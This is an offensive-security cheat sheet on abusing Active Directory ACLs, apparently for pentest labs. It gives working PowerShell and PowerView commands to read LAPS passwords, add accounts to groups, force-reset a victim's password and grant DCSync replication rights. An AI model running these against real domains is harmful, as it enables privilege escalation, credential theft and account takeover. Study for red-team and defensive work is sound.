# ACL Abuse

## Enumeration

{% tabs %}
{% tab title="ADModule" %}

```
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
```

{% endtab %}

{% tab title="PowerView\_Dev" %}

```
Find-InterestingDomainACL -ResolveGUIDs
```

{% endtab %}

{% tab title="PowerView" %}

```
Invoke-ACLScanner -ResolveGUIDs
```

{% endtab %}
{% endtabs %}
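Added example, not from the original page: the same enumeration done with only the ADModule, keeping just the rights abused below, dropping the default privileged principals, and resolving the ACE's `ObjectType` GUID to a schema attribute or extended-right name (what PowerView's `-ResolveGUIDs` does). The search base and domain are placeholders.

```powershell
# Added example: find interesting ACEs under an OU with the ADModule only.
Import-Module ActiveDirectory   # or the Microsoft.ActiveDirectory.Management.dll import shown above

$searchBase  = 'OU=Corp,DC=techcorp,DC=local'   # assumed scope; use the domain DN to scan everything
$interesting = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner|Self|ExtendedRight'
# principals that are expected to have these rights; hide them so misconfigurations stand out
$ignore      = '^(NT AUTHORITY|BUILTIN)\\|\\(Domain Admins|Enterprise Admins|Domain Controllers)$'

# Build a GUID -> name map from the schema (attributes/classes) and the Extended-Rights container
$rootDse = Get-ADRootDSE
$guidMap = @{ '00000000-0000-0000-0000-000000000000' = 'All' }
Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' -Properties name, schemaIDGUID |
  ForEach-Object { $guidMap[([Guid]$_.schemaIDGUID).ToString()] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" -LDAPFilter '(rightsGuid=*)' -Properties name, rightsGuid |
  ForEach-Object { $guidMap[([Guid]$_.rightsGuid).ToString()] = $_.name }

Get-ADObject -SearchBase $searchBase -Filter * |
  ForEach-Object {
    $dn = $_.DistinguishedName
    (Get-Acl -Path "AD:\$dn").Access |
      Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        "$($_.ActiveDirectoryRights)" -match $interesting -and
        "$($_.IdentityReference)" -notmatch $ignore
      } |
      Select-Object @{n='Object'; e={$dn}},
                    IdentityReference,
                    ActiveDirectoryRights,
                    # which attribute or extended right the ACE is scoped to ('All' = whole object)
                    @{n='Scope'; e={ $guidMap[$_.ObjectType.ToString()] }},
                    IsInherited
  } |
  Format-Table -AutoSize -Wrap
```

A `WriteProperty` row whose `Scope` is `member` is the group case below, `ExtendedRight` scoped to `All` on computer objects is the LAPS case, and `WriteDacl` on the domain root is the DCSync case.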

## ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The LAPS password lives in the confidential attribute `ms-Mcs-AdmPwd` on the computer object, so a principal with ReadProperty on all properties or an ExtendedRight (control access) over the computer objects in an OU can read the local administrator password of every computer in that OU in cleartext. The IdentityReferenceName of such an ACE is the account to go after.

{% tabs %}
{% tab title="LAPS Module" %}

```
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# List the principals that hold extended rights on the OU (and so can read its LAPS passwords)
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised one of those principals, read a computer's LAPS password
Get-AdmPwdPassword -ComputerName <targetmachine>
```

{% endtab %}
{% endtabs %}
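Added example, not from the original page: walk every OU to find the ones where a principal we control holds the extended right, then read the password straight from the attribute with the ADModule (no LAPS cmdlets needed). The principal, computer and module path are placeholders.

```powershell
# Added example: which OUs can our user read LAPS passwords in, and read one without AdmPwd.PS.
Import-Module ActiveDirectory
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1   # path from the page; adjust as needed

$principal = 'TECHCORP\USER'   # assumed: the account we control (DOMAIN\sam format as LAPS reports it)
$computer  = 'TARGET'          # assumed: a computer inside one of those OUs

# Every OU where $principal is listed among the extended-right holders
Get-ADOrganizationalUnit -Filter * |
  ForEach-Object { Find-AdmPwdExtendedRights -Identity $_.DistinguishedName -ErrorAction SilentlyContinue } |
  Where-Object { $_.ExtendedRightHolders -contains $principal } |
  Select-Object ObjectDN, ExtendedRightHolders

# The password is just a (confidential) attribute; ReadProperty on it is all we need.
# Expiration is a Windows FILETIME stored as a large integer.
Get-ADComputer -Identity $computer -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime' |
  Select-Object Name, 'ms-Mcs-AdmPwd',
    @{n='Expires'; e={ [DateTime]::FromFileTime([Int64]$_.'ms-Mcs-AdmPwdExpirationTime') }}
```

If `ms-Mcs-AdmPwd` comes back empty while the expiration time is populated, the account lacks the right: AD silently omits confidential attributes the caller cannot read rather than returning an error.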

## WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group. With GenericAll or WriteProperty on `member` we can add any principal; with only Self-Membership (the validated write on `member`) we can add only our own account.

{% tabs %}
{% tab title="ADModule" %}

```
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"
```

{% endtab %}

{% tab title="PowerView\_dev" %}

```
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
```

{% endtab %}
{% endtabs %}

## GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform a Resource Based Constrained Delegation attack: the right lets us write `msDS-AllowedToActOnBehalfOfOtherIdentity` on the computer object, naming an account whose key we control, which can then use S4U2Self and S4U2Proxy to obtain a service ticket to that computer as any user (Protected Users members and accounts marked "sensitive and cannot be delegated" excepted).

## GenericAll over User Object

Can reset their password without knowing the old one (the User-Force-Change-Password extended right on its own is enough). Resetting is noisy: the legitimate user is locked out and the DC logs event 4724, so prefer it only when a quieter path is not available.
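Added example, not from the original page: force-reset the password with the ADModule, confirm the change, and prove the new credential works against LDAP. `VICTIM`, the password and the domain are placeholders; run it as the principal holding GenericAll.

```powershell
# Added example: password reset with GenericAll (or User-Force-Change-Password) over a user.
Import-Module ActiveDirectory

$domain = 'techcorp.local'
$target = 'VICTIM'                                                   # assumed target samAccountName
$newPwd = ConvertTo-SecureString 'Summer2024!' -AsPlainText -Force   # assumed new password

# -Reset uses the force-change extended right, so the old password is never needed
Set-ADAccountPassword -Identity $target -Reset -NewPassword $newPwd -Server $domain

# PasswordLastSet should now be the current time
Get-ADUser -Identity $target -Properties PasswordLastSet -Server $domain |
  Select-Object SamAccountName, PasswordLastSet

# Prove the credential works: bind to LDAP as the victim
$cred = New-Object System.Management.Automation.PSCredential("$domain\$target", $newPwd)
Get-ADUser -Identity $target -Credential $cred -Server $domain | Select-Object DistinguishedName

# PowerView (dev) equivalent; -Credential lets you act as the user holding the right
# Set-DomainUserPassword -Identity $target -AccountPassword $newPwd -Credential $cred
```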

## WriteDACL over Domain Object

WriteDACL on the domain object itself (the `DC=...` root, not the domain controller's computer object) lets us add ACEs to it. Granting a user we control the replication extended rights (DS-Replication-Get-Changes, -All and -In-Filtered-Set) gives it DCSync, i.e. every hash in the domain.

{% tabs %}
{% tab title="RACE" %}

```
# RACE.ps1 (https://github.com/samratashok/RACE) must be loaded in the session
Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
```

{% endtab %}

{% tab title="PowerView3" %}

```
# -TargetIdentity is the domain root the ACE is written to; -Rights DCSync adds all three replication rights
Add-DomainObjectAcl -TargetIdentity 'DC=techcorp,DC=local' -PrincipalIdentity USER -Rights DCSync -Verbose
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces" %}
